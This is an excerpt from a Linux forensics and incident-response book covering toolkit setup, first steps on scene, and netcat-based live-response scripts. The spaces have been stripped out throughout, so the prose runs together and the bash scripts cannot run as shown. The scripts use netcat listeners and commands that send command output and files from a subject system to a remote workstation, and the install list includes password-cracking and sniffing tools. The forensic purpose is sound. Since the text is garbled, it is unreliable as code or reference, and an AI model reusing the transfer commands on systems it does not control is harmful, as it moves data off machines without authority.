AscanbeseeninFigure1.2,itallbeginswithacall.Someonebelievesthatabreach(orsomethingelse)hasoccurredandtheyhavecalledyoutoinvestigate.Yournextstepistodeterminewhetherornot therewasabreach.Asmall amountof liveanalysismightberequiredinordertomakethisdetermination.Ifnobreachoccurred,yougettodocumentwhathappenedandaddthistoyourknowledgebase.
If therewas an incident, youwould normally startwith live analysis before decidingwhether or not dead analysis is justified. If you deem it necessary to perform the deadanalysisyouneedtoacquiresomeimagesandthenactuallyperformtheanalysis.Whetherornotyouperformedadeadanalysisitisn’toveruntilthereportsarewritten.Allofthesestepswillbediscussedindetailinfuturechapters.
BUILDINGATOOLKITInordertodoLinuxforensicseffectivelyyoumightwanttoacquireafewtools.WhenitcomestosoftwaretoolsyouareinluckasalloftheLinuxforensicstoolsarefree(mostare alsoopen source). In addition to thenotebookdiscussedpreviously, somehardwareandsoftwareshouldbeineveryforensicinvestigator’stoolkit.
HardwareYouwilllikelywantoneormoreexternalharddrivesformakingimages(bothRAMandhard disks). External hard drives are preferred as it ismuch easier to sharewith otherinvestigatorswhentheycanjustpluginadrive.USB3.0devicesarethebestastheyaresignificantlyfasterthantheirUSB2.0counterparts.
Awriteblockerisalsohelpfulwheneveranimageistobemadeofanymedia.Severalhardwarewriteblockersareavailable.Mostofthesearelimitedtooneparticularinterface.If your budget affords only one hardware write blocker, I would recommend a SATAblockerasthisisthemostcommoninterfaceinuseatthistime.Softwarewriteblockersarealsoapossibility.Asimplesoftwarewriteblockerispresentedlaterinthisbook.
SoftwareSoftwareneedsfall intoafewcategories:forensictools,systembinaries,andliveLinuxdistributions. Ideally these tools are stored onUSB 3.0 flash drives and perhaps a fewDVDsifyouanticipateencounteringsystemsthatcannotbootfromaUSBdrive.Givenhow cheapUSB flash drives are today, even investigatorswithmodest budgets can bepreparedformostsituations.
Thereareanumberofwaystoinstallasetofforensicstools.Theeasiestmethodistoinstall a forensics oriented Linux distribution such as SIFT from SANS (http://digital-forensics.sans.org/community/downloads).Personally,IprefertotorunmyfavoriteLinuxandjustinstallthetoolsratherthanbestuckwithsomeoneelse’sthemesandsluggishlivesystem performance. The following scriptwill install all of the tools found in SIFT onmostDebianorUbuntubasedsystems(unliketheSANSinstallscriptthatworksonlyonspecificversionsofUbuntu).#!/bin/bash
#SimplelittlescripttoloadDFIRtoolsintoUbuntuandDebiansystems
#byDr.PhilPolstra@ppolstra
#createrepositories
echo“debhttp://ppa.launchpad.net/sift/stable/ubuntutrustymain”\
>/etc/apt/sources.list.d/sift-ubuntu-stable-utopic.list
echo“debhttp://ppa.launchpad.net/tualatrix/ppa/ubuntutrustymain”\
>/etc/apt/sources.list.d/tualatrix-ubuntu-ppa-utopic.list
#listofpackages
pkglist=”aeskeyfind
afflib-tools
afterglow
aircrack-ng
arp-scan
autopsy
binplist
bitpim
bitpim-lib
bless
blt
build-essential
bulk-extractor
cabextract
clamav
cryptsetup
dc3dd
dconf-tools
dumbpig
e2fslibs-dev
ent
epic5
etherape
exif
extundelete
f-spot
fdupes
flare
flasm
flex
foremost
g++
gcc
gdb
ghex
gthumb
graphviz
hexedit
htop
hydra
hydra-gtk
ipython
kdiff3
kpartx
libafflib0
libafflib-dev
libbde
libbde-tools
libesedb
libesedb-tools
libevt
libevt-tools
libevtx
libevtx-tools
libewf
libewf-dev
libewf-python
libewf-tools
libfuse-dev
libfvde
libfvde-tools
liblightgrep
libmsiecf
libnet1
libolecf
libparse-win32registry-perl
libregf
libregf-dev
libregf-python
libregf-tools
libssl-dev
libtext-csv-perl
libvshadow
libvshadow-dev
libvshadow-python
libvshadow-tools
libxml2-dev
maltegoce
md5deep
nbd-client
netcat
netpbm
nfdump
ngrep
ntopng
okular
openjdk-6-jdk
p7zip-full
phonon
pv
pyew
python
python-dev
python-pip
python-flowgrep
python-nids
python-ntdsxtract
python-pefile
python-plaso
python-qt4
python-tk
python-volatility
pytsk3
rsakeyfind
safecopy
sleuthkit
ssdeep
ssldump
stunnel4
tcl
tcpflow
tcpstat
tcptrace
tofrodos
torsocks
transmission
unrar
upx-ucl
vbindiff
virtuoso-minimal
winbind
wine
wireshark
xmount
zenity
regripper
cmospwd
ophcrack
ophcrack-cli
bkhive
samdump2
cryptcat
outguess
bcrypt
ccrypt
readpst
ettercap-graphical
driftnet
tcpreplay
tcpxtract
tcptrack
p0f
netwox
lft
netsed
socat
knocker
nikto
nbtscan
radare-gtk
python-yara
gzrt
testdisk
scalpel
qemu
qemu-utils
gddrescue
dcfldd
vmfs-tools
mantaray
python-fuse
samba
open-iscsi
curl
git
system-config-samba
libpff
libpff-dev
libpff-tools
libpff-python
xfsprogs
gawk
exfat-fuse
exfat-utils
xpdf
feh
pyew
radare
radare2
pev
tcpick
pdftk
sslsniff
dsniff
rar
xdot
ubuntu-tweak
vim”
#actuallyinstall
#firstupdate
apt-getupdate
forpkgin${pkglist}
do
if(dpkg—list|awk‘{print$2}’|egrep“^${pkg}$”2>/dev/null);
then
echo“yeah${pkg}alreadyinstalled”
else
#trytoinstall
echo-n“Tryingtoinstall${pkg}…”
if(apt-get-yinstall${pkg}2>/dev/null);then
echo“+++Succeeded+++”
else
echo“–-FAILED–-”
fi
fi
done
Briefly,theabovescriptworksasdescribedhere.First,werunaparticularshell(bash)
usingthespecialcommentconstruct#!{commandtorun}.This isoftencalledthe“she-bang” operator or “pound-bang” or “hash-bang,” Second, the lines with the echostatements add two repositories to our list of software sources. Technically, theserepositoriesareintendedtobeusedwithUbuntu14.04,buttheyarelikelytoworkwithnewversionsofUbuntuand/orDebianaswell.
Third,avariablenamedpkglistiscreatedwhichcontainsalistofthetoolswewishtoinstall.Fourth,weupdateourlocalapplicationcachebyissuingthecommandapt-getupdate.Finally,weiterateoverourlistofpackagesstoredinpkglistandinstallthemiftheyaren’talready installed.The test involvesastringofcommands,dpkg—list|awk‘{print$2}’|egrep“^${pkg}$”2>/dev/null.The commanddpkg—list listsallinstalledpackagesandthislist isthenpassedtoawk‘{print$2}’ which causes the secondword (the package name) to be printed; this is in turnpassed toegrep“^${pkg}$”2>/dev/nullwhich checks to see if the packagenameexactlymatchesonethatisinstalled(the^matchesthestartand$matchestheend).Anyerrorsaresenttothenulldevicebecauseweonlycareiftherewereanyresults.
A set of known good system binaries should be installed to a flash drive in order tofacilitate live response.Ataminimumyouwillwant the /bin, /sbin, and /libdirectories(/lib32and/lib64for64-bitsystems)fromaknowngoodsystem.Youmayalsowanttograb the /usrdirectoryorat least /usr/local/, /usr/bin,and /usr/sbin.MostLinuxsystemsyouarelikelytoencounterarerunning64-bitversionsofLinux;afterall,64-bitLinuxhasbeenavailablesincebefore64-bitprocessorswerecommerciallyavailable. Itmightstillbeworthhavinga32-bitsystemonhand.
On occasion a liveLinux system installed on a bootableUSB drive could be useful.EitheradistributionsuchasSIFTcanbeinstalledbyitselfonadriveorthelivesystemcan be installed on the first partition of a larger USB drive and the system binariesinstalledonasecondpartition.IfyouareusingaUSBdrivewithmultiplepartitionsitisimportanttoknowthatWindowssystemswillonlyseethefirstpartitionandthenonlyifitisformatedasFATorNTFS.PartitionscontainingsystembinariesshouldbeformattedasEXT2,EXT3,orEXT4inordertomountthemwithcorrectpermissions.Detailsofhowtomountthesesystembinarieswillbeprovidedinfuturechapters.
THISISTAKINGTOOLONGRunningliveLinuxinavirtualmachineIf youdecide to create abootableSIFT (or similar)USBdriveyouwill quicklyfind that it takes hours to install the packages from SIFT. This can tie up yourcomputer for hours preventing you from getting any realwork done. There is awaytobuildtheUSBdrivewithouttyingupthemachine,however.WhatyouneedtodoissetupavirtualmachinethatcanberunfromaliveLinuxdistributiononaUSB drive. The following instructions assume you are runningVirtualBox on aLinuxhostsystem.
VirtualBoxshipswithseveral tools.Oneof these iscalledvboxmanage.Thereare several commands vboxmanage supports. Typingvboxmange–help in aterminalwillgiveyoualonglistofcommands.Thiswillnotlistthecommandthatweneed,however,asitisoneoftheinternalcommands.
Inordertocreateavirtualdiskthatpointstoaphysicaldeviceyoumustexecutethe following command as root: vboxmanage internalcommandscreaterawvmdk -filename <location of vmdk file> -rawdisk <USB device>. For example, if your thumb drive is normallymounted as /dev/sdb the following command could be used: vboxmanageinternalcommands createrawvmdk -filename/root/VirtualBox\Vms/usb.vmdk-rawdisk/dev/sdb.Note thatyou cannot just sudo this command as the regular user will have permissionproblems trying to run the virtual machine later. Creating this virtual drive andrunningVirtualBoxisshowninFigure1.3.
Oncethevirtualdiskfilehasbeencreated,setupanewvirtualmachineinthenormalmanner.Dependingon the liveLinuxyouhavechosen,youmayneed toenableEFIsupportasshowninFigure1.7.ThecreationoftheliveLinuxvirtualmachine isshowninFigure1.4 throughFigure1.6.ThevirtualmachinerunningforthefirsttimeisshowninFigure1.8.
FIGURE1.3
CreatingavirtualdiskfilethatpointstoaphysicalUSBdrive.
FIGURE1.4
CreatingavirtualmachinethatrunsaliveLinuxdistributionfromaUSBdrive.
FIGURE1.5
SettingupmemoryfortheliveLinuxvirtualmachine.BecertaintoselectthemaximumamountofmemoryforbetterperformancerunningalivedistributionaseverythingisrunfromRAM.
FIGURE1.6
SelectingtheUSBphysicaldrivefortheliveLinuxvirtualmachine.
FIGURE1.7
EnablingEFIsupportinVirtualBox.
FIGURE1.8
RunningavirtualmachinefromaUSBdrive.
SUMMARYIn thischapterwehavediscussedall thepreliminary items that shouldbe takencareof
before arriving on the scene after a suspected incident has occurred. We covered thehardware,software,andothertoolsthatshouldbeinyourgobag.Inthenextchapterwewilldiscussthefirstjobwhenyouarrive,determiningiftherewasanincident.
CHAPTER
2DeterminingIfThereWasanIncidentINFORMATIONINTHISCHAPTER:
OpeningacaseTalkingtousersDocumentationMountingknown-goodbinariesMinimizingdisturbancetothesubjectsystemUsingscriptingtoautomatetheprocessCollectingvolatiledata
OPENINGACASEThis chapterwill address the highlighted box from our high-level process as shown inFigure 2.1. We will come to learn that there is often much involved in determiningwhetherornottherewasanincident.Wewillalsoseethatsomelimitedliveresponsemaybenecessaryinordertomakethisdetermination.
FIGURE2.1
TheHigh-levelInvestigationProcess.
Beforeyoudoanythingelse,whenyouarriveonthescene,youshouldopenacasefile.Thisisnotascomplicatedasitsounds.Youcouldliterallycreateafolderonyourlaptopwithacasenumber.What shouldyouuse foracasenumber?Whateveryouwant.Youmightwantacasenumberthatisayear-numberoryoumightprefertousethedateforacasenumberundertheassumptionthatyouwon’tbestartingmultiplecasesonthesameday.Youcouldalwaysappendanumbertothedateifyouhadmultiplecasesinagivenday.
You might also consider starting a new entry in your bound notebook (with thenumbered pages). Somemight prefer to wait until they are sure there was an incidentbeforeconsumingspaceintheirnotebooksforafalsealarm.Mypersonalfeelingonthisisthatnotebooksarecheapanditiseasierandcleanerifyoustarttakingnotesinoneplacefromtheverybeginning.
TALKINGTOUSERSBeforeyoueverthinkabouttouchingthesubjectsystemyoushouldinterviewtheusers.Why?Because theyknowmoreabout thesituation thanyouwill.Youmightbeable todeterminethatitwasallafalsealarmveryquicklybytalkingtotheusers.Forexample,perhapsitwasasystemadministrator thatputanetworkcardinpromiscuousmodeandnotmalwareoranattacker. Itwouldbe farbetter foreveryone ifyou found thisoutbytalkingtotheadministratornowthanafterhoursofinvestigating.
You should ask the users a series of questions. The first question youmight ask is,“Whydidyou callme?”Was there an event that led toyourbeing called in?Does theorganizationlackaqualifiedpersontoperformtheinvestigation?Doestheorganization’spolicyonpossibleincidentsrequireanoutsideinvestigator?
The second question you might ask is, “Why do you think there is a problem orincident?” Did something strange happen? Is the network and/or machine slower thannormal?Istheretrafficonunusualports?UnlikeWindowsusers,mostLinuxusersdon’tjustshrugoffstrangebehaviorandreboot.
Next you want to get as much information as you can about the subject (suspectedvictim)system.Whatisthesystemnormallyusedfor?Wheredidthesystemcomefrom?Wasitpurchasedlocallyoronline,etc?Asmanyreadersarelikelyaware,ithascometolight that certain government entities are not above planting parasitic devices inside acomputer that has been intercepted during shipment. Has the computer been repairedrecently? If so, by whom? Was it an old, trusted friend or someone new? Malicioussoftwareandhardwareareeasilyinstalledduringsuchrepairs.
DOCUMENTATIONAspreviouslymentioned,youcannotoverdothedocumentation.Youshouldwritedownwhat the users told you during your interviews. In addition to the advantages alreadymentioned forusinganotebook,writingnotes inyournotebook is a lot lessdistractingandintimidatingfortheusersthanbangingawayatyourlaptopkeyboardorevenworsefilmingtheinterviews.
Youshouldalsowritedowneverythingyouknowaboutthesubjectsystem.Ifitseemsappropriateyoumightconsidertakingapictureofthecomputerandscreen.Ifyoususpectthatphysicalsecurityhasbeenbreached,itisanespeciallygoodidea.Youarenowreadytoactuallytouchthesubjectsystem.
VIRTUALCOMPLICATIONSIfyouareusingavirtualmachine,oldermaybebetterIhavepreviouslyrecommendedtheuseofaUSB3.0driveforperformancereasons.Ifyouareusingavirtualmachinetopracticewhileyouaregoingthroughthisbook,a USB 2.0 drive might be preferred. The reason for this is that some of thevirtualization software seems to have issues dealingwithUSB3.0devices.At thetimeofthiswritingUSB2.0devicesseemtocauselessproblems.
Regardlessofthetypeofdriveyouhave,thehostoperatingsystemswillinitiallytrytolayclaimtoanyattacheddevice.IfyouareusingVirtualBox,youwillneedtocheck the appropriate device from the USB Devices submenu under Devices asshowninFigure2.2.
FIGURE2.2
SelectingaUSBDrive.Ifyoursubjectsystemisrunninginsideavirtualmachineyouwillneedtopassthedevicealongtothevirtualmachinebyselectingthedeviceasshownhere.
MOUNTINGKNOWN-GOODBINARIESIn most cases if you insert your USB drive with known-good binaries, it will beautomounted.Ifthisisn’tthecaseonthesubjectsystem,youwillneedtomanuallymountthedrive.Onceyourdriveismountedyoushouldrunaknown-goodshelllocatedonyourdrive.Youarenotdoneafteryourunthisshell,however.Youmustsetyourpathtoonlypoint at the directories on your USB drive and also reset the LD_LIBRARY_PATHvariabletoonlyreferencelibrarydirectoriesontheUSBdrive.
The first thing youwillwant to do is to check that your filesystem has in fact beenmounted.SomeversionsofLinuxwillnotautomaticallymountanextended(ext2,ext3,orext4)filesystem.MostLinuxsystemswillautomountaFATorNTFSfilesystem,however.Recall that your system binariesmust be housed on an extended filesystem in order topreservetheirpermissions.Theeasiestwaytocheckifsomethingismountedistoexecutethemount command. The results of running this command with my Linux forensicsresponsedriveareshowninFigure2.3.Noticethatmydriveismountedas/dev/sdbwiththreepartitions.ThefirsttwopartitionsareaFATandext4partitionforaliveversionofLinux(SIFTinthiscase)andthethirdpartitioncontains64-bitsystembinaries.
FIGURE2.3
Verifying That a USBDrive IsMounted. In this figure the three highlighted partitions from the USB drive(/dev/sdb)haveallbeenautomaticallymounted.
Ifyouareunsurewhatdriveletterwillbeassignedtoyourincidentresponsedrivethedmesgcommandcanoftenhelp.TheresultsofrunningdmesgafterinsertingaUSBdriveare shown in Figure 2.4. The portion that demonstrates the drive has been assigned to
/dev/sdbishighlighted.
FIGURE2.4
Result of running dmesg command. The portion that shows drive letter /dev/sdb has been assigned ishighlighted.
Ifyouneed tomanuallymountyourdrive firstcreateamountdestinationby runningsudomkdir/mnt/{destination}, i.e.sudomkdir/mnt/good-binsorsimilar. Now that a destination exists the drive can be mounted using sudo mount/dev/{source partition} /mnt/{destination}, i.e. sudo mount/dev/sdb1/mnt/good-bins.
Onceeverythingismountedchangeto therootdirectoryforyourknow-goodbinariesandthenrunbashbytypingexecbin/bashasshowninFigure2.5.Oncetheknown-goodshellisloadedthepathmustberesettoonlypointtotheresponsedrivebyrunningexportPATH=$(pwd)/sbin:$(pwd)/bin as shown in Figure 2.6.Herewe areusingashelltrick.Ifyouencloseacommandinparenthesesthatareproceededbya$thecommandisrunandtheresultsaresubstituted.Finally,thelibrarypathmustalsobesettopoint to known-good library files by running exportLD_LIBRARY_PATH=$(pwd)/lib64:$(pwd)/libasshowninFigure2.7. Ifyouhave also copied some of the directories under /usr (recommended) then these pathsshouldalsobeincludedinthePATHandLD_LIBRARY_PATH.
FIGURE2.7
Makingthelibrarypathpointtoknown-goodfiles.
MINIMIZINGDISTURBANCETOTHESUBJECTSYSTEMUnfortunately, it is impossible to collect all the data from a running system withoutcausingsomethingtochange.Yourgoalasaforensicinvestigatorshouldbetominimizethisdisturbancetothesubjectsystem.Therearetwothingsyoushouldneverdoifyoucanavoidit.First,donotinstallanythingonthesubjectsystem.Ifyouinstallnewsoftwareitwill substantially change the systemwhen configuration files, libraries, and executablesare saved to the subject’s media. The worst possible situation would be to compilesomethingfromsourcecodeasitwillcausemanytemporaryfilestobecreatedandwillalso consume memory (possibly pushing out other more interesting information) andaffectamemoryimageshouldyouchoosetomakeone.
Thesecondthingyoushouldavoidiscreatingnewfilesonthesystem.Ifyoumustuseatoolthatisnotinstalled,haveitonyourresponseUSBdrive.Don’tcreatememoryordiskimagesandthenstorethemonthesubjectsystemeither!
YouwilldefinitelyalterwhatisinRAMwhenyouinvestigateasystem.Youshouldtrytominimizeyourmemoryfootprint,however.Thereareacoupleofwaysthatyoumightaccomplish these goals. Two popular solutions are to store data onUSBmedia (whichcouldbeyourresponsedrive)ortousethenetcatutility.
UsingaUSBdrivetostoredataAttachingaUSBdrivetothesubjectsystemisminimallyinvasive.Thiswillcausesomenewentriesinafewtemporarypseudofilesystemssuchas/procand/sysandthecreationofanewdirectoryunder/mediaonmostversionsofLinux.AfewlargerUSB3.0backup
drives should be in your toolkit for just such occasions. Itmight be best to copy yoursystembinaries to thisdrivefirstshouldyouendupgoing this route toavoidhaving tomountmorethanoneexternaldrive.
OncetheUSBdrivehasbeenattachedyoucanusethetechniquesdescribedearliertooperatewithknown-goodsystembinariesandutilities.LogfilesandotherdatadiscussedinthischaptercanbestoredtotheUSBdrive.TechniquesdescribedinlaterchapterscanbeusedtostoreimagesontheUSBdrive.Evenifyouusedthenetcatutility(describednext), having someUSBbackupdrives onhand canmake sharing imagesmuch easier.Naturally,whateveryoudoshouldbedocumentedinyourboundnotebook.
UsingNetcatWhileusingaUSBdrivemeetsourgoalsofnotinstallinganythingorcreatingnewfilesonthesubjectsystem(withtheexceptionsnotedabove)itdoesnotminimizeourmemoryfootprint.Copying toslowUSBstoragedevices (especiallyUSB2.0drives) is likely toresult ina significantamountofcachingwhichwill increaseourmemory footprint.Forthis reason, the use ofnetcat is preferredwhen the subject system is connected to anetworkofreasonablespeedandreliability.
Wired gigabitEthernet is themost desirablemedia. If you are forced to usewirelessnetworking,doyourbesttoensureyourforensicsworkstationhasastrongsignalfromtheaccesspoint.Ifneitheroftheseareanoption,youmaybeabletoconnectyourforensicslaptopdirectlytothesubjectsystemviaacrossovercable.
Realize that thesubjectsystemisprobablysetup touseDynamicHostConfigurationProtocol(DHCP)soyouwilleitherneedtousestaticIPaddressesonbothendsorinstallaDHCPserveronyourforensicslaptopifyougothecrossovercableroute.Ifthesubjectsystem has only one network interface thatmust be disconnected I recommend againstusing thecrossovercableas itwilldisturb thesystemtoomuch.To temporarilysetupastatic IP on each end of your crossover cable issue the command sudoifconfig{interface} down && sudo ifconfig {interface} {IP} netmask{netmask}up,i.e.sudoifconfigeth0down&&sudoifconfigeth0192.168.1.1 netmask 255.255.255.0 up. Make sure you give each end adifferentIPonthesamesubnet!
Settingupanetcatlistener
Youwillneedtosetuponeormorelistenersontheforensicsworkstation.Thesyntaxforsettingupalistenerisprettysimple.Typingnetcat-l{port}willcausealistenerto be created on every network interface on the machine. Normally this informationshould be stored in a file by redirecting netcat’s output using > or >>. Recall that thedifference between> and>> is that > causes an existing file to be overwritten and>>appendsdataifthefilealreadyexists.
I recommend that you create a listener on the forensicsworkstation that receives theoutputofallthecommandsyouwishtorunonthesubjectsysteminasinglelogfile.Thiskeeps everything in one place. By default netcat will terminate the listener upon
receivingtheend-of-file(EOF)marker.The-koptionfornetcatwillkeepthelisteneraliveuntilyoupressControl-Cintheterminalwhereyoustartednetcat.Thecommandto start the log file listener is netcat -k -l {port} >> {log file}, i.e.netcat-k-l9999>>example-log.txt.ThiscommandisshowninFigure2.8.NotethatwhileIhaveusednetcatherethisisasymboliclinktothesameprogrampointedtobynconmostsystems,soyoucanusewhicheveryouprefer.
FIGURE2.8
Runninganetcatlistenerontheforensicsworkstation.
SendingdatafromthesubjectsystemNowthatyouhavealistenerontheforensicsworkstationitiseasytosenddataacrossthenetwork using netcat. The general sequence for sending something for logging is{command} | nc {forensic workstation IP} {port}. For commandsthat do not have output thatmakes it obviouswhatwas run youmightwant to send aheaderofsortsusingtheechoutilitybeforesendingtheoutputof thecommand.This isdemonstratedinFigure2.9.TheresultsofrunningthecommandsshowninFigure2.9areshown inFigure2.10.Usingscripting toautomate thisprocess isdiscussed later in thischapter.
FIGURE2.9
Usingnetcattosendinformationtotheforensicsworkstation.
FIGURE2.10
ResultsreceivedbylistenerfromcommandsinFigure2.9.
SendingfilesItisnotunusualtoextractsuspiciousfilesfromasubjectsystemforfurtherstudy.Netcat
is alsohandy forperforming this task. Inorder to receivea fileyou should start anewlistenerontheforensicsworkstationthatdoesn’tusethe-koption.Inthiscaseyouwanttoendthelistenerafterthefilehasbeentransmitted.Thecommandisnc-l{port}>{filename}.
Onthesubjectsystemthesuspectfileisredirectedintothenetcattalker.Thesyntaxfor sending the file is nc {forensic workstation IP} {port} <{filename}, i.e.nc192.168.1.1194444</bin/bash. The listener andtalkerforthisfiletransferareshowninFigure2.11andFigure2.12,respectively.
FIGURE2.11
Settingupanetcatlistenertoreceiveafile.
FIGURE2.12
Usingnetcattosendafile.
USINGSCRIPTINGTOAUTOMATETHEPROCESSIt should be fairly obvious that our little netcat system described above is ripe forscripting.The first questiononemight ask iswhat sort of scripting language shouldbeused.ManywouldimmediatelyjumptousingPythonforthistask.WhileImightliketousePythonformanyforensicsandsecuritytasks,itisnotthebestchoiceinthiscase.
Thereareacoupleofreasonswhyshellscriptingisabetterchoice,inmyopinion.First,we want to minimize our memory footprint, and executing a Python interpreter runscounter to that goal. Second, a Python script that primarily just runs other programs issomewhatpointless.Itismuchsimplertoexecutetheseprogramsdirectlyinashellscript.As an additional bonus for some readers, the scripts described here constitute a niceintroductiontobasicshellscripting.
ScriptingtheserverThescriptsshownbelowwillcreateanewdirectoryforcasefilesandstarttwolisteners.Thefirstlistenerisusedtologcommandsexecutedonthesubject(client)machineandthesecond is used to receive files.A script to clean up and shut down the listeners is alsopresented.Hereisthemainscript,start-case.sh:#!/bin/bash
#
#start-case.sh
#
#Simplescripttostartanewcaseonaforensics
#workstation.Willcreateanewfolderifneeded
#andstarttwolisteners:oneforloginformation
#andtheothertoreceivefiles.Intendedtobe
#usedaspartofinitialliveresponse.
#byDr.PhilPolstra(@ppolstra)asdevelopedfor
#PentesterAcademy.com.
usage(){
echo“usage:$0<casenumber>”
echo“Simplescripttocreatecasefolderandstartlisteners”
exit1
}
if[$#-lt1];then
usage
else
echo“Startingcase$1”
fi
#ifthedirectorydoesn’texistcreateit
if[!-d$1];then
mkdir$1
fi
#createtheloglistener
`nc-k-l4444>>$1/log.txt`&
echo“Startedloglistenerforcase$1on$(date)”|nclocalhost4444
#startthefilelistener
`./start-file-listener.sh$1`&
This script starts with the special comment “#!” also known as the she-bang whichcausesthebashshelltobeexecuted.Itisimportanttorunaparticularshellasuserswhoareallowedtopicktheirownmightselectsomethingincompatiblewithyourscript.A#anywhereona linebeginsacommentwhich terminatesat theendof the line.The firstseverallinesarecommentsthatdescribethescript.
After thecommentsafunctioncalledusage isdefined.Todefineafunction inashellscript simply type itsname followedbya space, emptyparentheses, another space, andthenenclosewhatevercommandsmakeupthefunctionincurlybrackets.Unlikecompiledlanguages and some scripting languages, shell scripts requirewhite space in the properplaces or they will not function correctly. The $0 in the line echo “usage: $0<casenumber>”isavariablethatissettothefirstcommandlineparameterthatwasusedtorunthescript,whichisthenameofthescriptfile.
Note the use of double quotes in the echo commands. Anything enclosed in doublequotes is expanded (interpreted)by the shell. If singlequotes areused, no expansion is
performed.Itisconsideredagoodprogrammingpracticetodefineausagefunctionthatisdisplayedwhenausersuppliescommandlineargumentsthatdonotmakesense.
The lineif [ $# -lt 1 ] ; then begins an if block. The logical test isenclosedinsquarebrackets.Notethattheremustbewhitespacearoundthebracketsandbetween parts of the logical test as shown. The variable $# is set to the number ofcommandlineargumentspassedintothescript.Inthisscriptifthatnumberislessthan1,theusage function is called, otherwise amessage about starting a case is echoed to thescreen.Thevariable$1isthefirstcommandlineparameterpassedin(rightafterthenameofthescript)whichismeanttobethecasename.Observethattheifblockisterminatedwithfi(ifspelledbackwards).
Theconditionalstatementintheifblockthatstartswithif[!-d$1];thenchecks to see if the case directory does not yet exist. The -d test checks to see that adirectorywith thename that followsexists.The !negates (reverses) the test so that thecodeinsidetheifblockisexecutedifthedirectorydoesn’texist.Thecodesimplyusesmkdirtocreatethedirectory.
Next the line`nc-k-l4444>>$1/log.txt`& starts a listener on port4444andsendseverythingreceivedtoafileinthecasedirectorynamedlog.txt.Notethecommandisenclosedinbackticks(backwardsinglequotes).Thistellstheshelltopleaserunthecommand.The&causesthecommandtoberuninthebackgroundsothatmorethingsmaybeexecuted.
Thenextlinesimplyechoesabannerwhichispipedtothelistenerinordertocreateaheaderfor the logfile.Finally,anotherscript isalsorun in thebackground.Thisscriptsstartsthefilelistenerprocess.Thisscriptisdescribednext.#!/bin/bash
#
#start-file-listener.sh
#
#Simplescripttostartanewfile
#listener.Intendedtobe
#usedaspartofinitialliveresponse.
#byDr.PhilPolstra(@ppolstra)asdevelopedfor
#PentesterAcademy.com.
#Whenafilenameissenttoport5555atransferon5556
#isexpectedtofollow.
usage(){
echo“usage:$0<casename>”
echo“Simplescripttostartafilelistener”
exit1
}
#didyouspecifyacasename?
if[$#-lt1];then
usage
fi
whiletrue
do
filename=$(nc-l5555)
nc-l5556>$1/$(basename$filename)
done
Thisscriptstartswiththestandardshe-bangwhichcausesthebashshelltobeused.Italsodefinesausagefunctionwhichiscalledifacasenameisnotpassedintothescript.Therealworkinthisscriptisinthewhileloopattheend.Thelinewhiletruecausesan infinite loopwhich is only exitedwhen the user pressesControl-Cor the process iskilled. Note that unlike the if block which is terminated with fi, the do block isterminatedwithdone(notod).
The first line in the loop runs anetcat listener onport 5555 and sets the filenamevariableequaltowhateverwasreceivedonthisport.Recallthatwehaveusedthistrickofrunning a command inside of $() to set a variable equal to the command results in thepreviousscript.Onceafilenamehasbeenreceivedanewlistenerisstartedonport5556(nc-l5556onthenextline)andtheresultsdirectedtoafilewiththesamenameinadirectory named after the case name (> $1/$(basename $filename) on thesecondhalfoftheline).Thefirstcommandlineargument,whichshouldbethecasename,isstoredin$1.Thebasenamecommandisusedtostripawayanyleadingpathforafilethatissent.
Onceafilehasbeenreceived,theinfiniteloopstartsanewlisteneronport5555andthecycle repeats itself. The loop exits when the cleanup script, to be described next, isexecuted.Theclientsidescriptsthatsendloginformationandfileswillbediscussedlaterinthischapter.#!/bin/bash
#
#close-case.sh
#
#Simplescripttostartshutdownlisteners.
#Intendedtobeusedaspartofinitialliveresponse.
#byDr.PhilPolstra(@ppolstra)asdevelopedfor
#PentesterAcademy.com.
echo“Shuttingdownlistenersat$(date)atuserrequest”|nclocalhost4444
killallstart-case.sh
killallstart-file-listener.sh
killallnc
Thisisoursimplestscriptyet.Firstweechoaquickmessagetoourloglisteneronport
4444, then we use the killall utility to kill all instances of our two scripts andnetcat. If you arewonderingwhywe need to killnetcat since it is called by thescripts,recallthatinsomecasesitisruninthebackground.Also,therecouldbeahungorin-processnetcatlistenerortalkeroutthere.Forthesereasonsitissafestjusttokillallthenetcatprocesses.
ScriptingtheclientNowthatwehaveaserver(theforensicsworkstation)waitingforustosendinformation,wewillturnourattentiontowardscriptingtheclient(subjectsystem).BecauseitwouldbebothersometoincludetheforensicsworkstationIPaddressandportswitheveryaction,wewill start by setting some environment variables to be used by other client scripts. Asimplescripttodojustthatfollows.#setup-client.sh
#
#Simplescripttosetenvironmentvariablesfora
#systemunderinvestigation.Intendedtobe
#usedaspartofinitialliveresponse.
#byDr.PhilPolstra(@ppolstra)asdevelopedfor
#PentesterAcademy.com.
usage(){
echo“usage:source$0<forensicsworkstationIP>[logport][filenameport][filetransferport]”
echo“Simplescripttosetvariablesforcommunicationtoforensicsworkstation”
exit1
}
#didyouspecifyafile?
if[$#-lt1];then
usage
fi
exportRHOST=$1
if[$#-gt1];then
exportRPORT=$2
else
exportRPORT=4444
fi
if[$#-gt2];then
exportRFPORT=$3
else
exportRFPORT=5555
fi
if[$#-gt3];then
exportRFTPORT=$4
else
exportRFTPORT=5556
fi
Noticethatthereisnoshe-bangatthebeginningofthisscript.Whynot?Recallthatyouwanttorunyourknown-goodversionofbash,notthepossiblevandalizedoneinthe/bindirectory.Anotherreasonthisscriptisshe-bangfreeisthatitmustbesourcedinorderfortheexportedvariables tobeavailable innewprocesses inyourcurrent terminal.This isdone by running the command source ./setup-client.sh {forensicsworkstationIP}inaterminal.
The script repeatedlyuses theexport commandwhich sets a variable andmakes itavailable tootherprocesses in thecurrent terminaloranychildprocessesof thecurrentterminal.Variables that arenotexportedareonlyvisiblewithin theprocess that createdthemandwecreateanewprocesseachtimewetypebash{scriptname}.Settingthesevalueswouldbepointlessiftheywereneverseenbytheotherclientscripts.SincetheserverIPaddressisrequired,westoreitintheRHOSTvariable.Thenwechecktoseeifanyoftheoptionalparametersweresupplied;ifnotweexportadefaultvalue,ifsoweexportwhatevertheuserentered.
Thefollowingscriptwillexecuteacommandandsendtheresultswrappedinaheaderandfootertotheforensicsworkstation.Aswiththepreviousscript,thereisnoshe-bangandyoumustexplicitlyrunthescriptbytypingbash./send-log.sh{commandwitharguments}.#send-log.sh
#
#Simplescripttosendanewlogentry
#tolisteneronforensicsworkstation.Intendedtobe
#usedaspartofinitialliveresponse.
#byDr.PhilPolstra(@ppolstra)asdevelopedfor
#PentesterAcademy.com.
#defaultsprimarilyfortesting
[-z“$RHOST”]&&{exportRHOST=localhost;}
